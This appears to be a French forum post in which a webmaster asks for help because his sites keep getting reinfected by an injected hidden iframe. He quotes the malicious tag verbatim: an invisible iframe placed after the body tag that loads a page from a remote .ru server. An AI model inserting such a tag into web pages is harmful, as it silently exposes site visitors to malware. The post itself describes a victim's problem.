boNjour,
Permettez moi d'exposer mon probleme qui est le suivant: il y a quelque temps, un message de google me
signal la presence d'un code malicieux sur mon site: www.santalgerie.com et qu'il va inclure dans les
résultats de la recherche pour mon site la mention -Ce site risque d'endommager votre ordinateur.-.
Apres verification de code de mes pages j'ai trouvé le code intrus, il s'agit d'un ifram juste apres la
balise <body> dont le contenant est le suivant:
<iframe src="http://u9a.ru:8080/index.php" width=198 height=118 style="visibility: hidden"></iframe>
pour remidier a cela et dans la folie, j'ai suprimé tout le site de la racine de serveur de mon hebergeur, et
j'ai mis une page index pour dire aux internautes que mon site est en travaux, jusqu'a maintenant tout va
bien car google a enlevé son alerte des resultats de recherche pour mon site. apres quelques jours et en
visitant ma page d'accueil (index), le code malicieux est la!!!! j'ai supprimé la page et j'ai refai le
travail, le lendemain c'est la meme chose, l'ifram est la apres la balise body.
Pour cela, en sachant que je ne suis qu'un amateur, je tourne vers vous pour me donner un remede, que
dois-je faire?
par ailleur sachez que j'ai supprimé tout le site de serveur via un client FTP mais j'ai pas supprimé les
bases de donnés (mysqel).
Je serai la pour tout autre éclaircissement.
Nb: je suis aussi le webmaster de site de mon association www.association-tazmart.org , le site est aussi
infecté avec le meme code (ifram), mais dans ce cas, apres suppression de site infecté (statique et sans base
de donnés), je l'est remis sous joomla mais le probleme perciste le code malicieux reviens apres son
élimination.
Merci pour votre aide a l'avance.
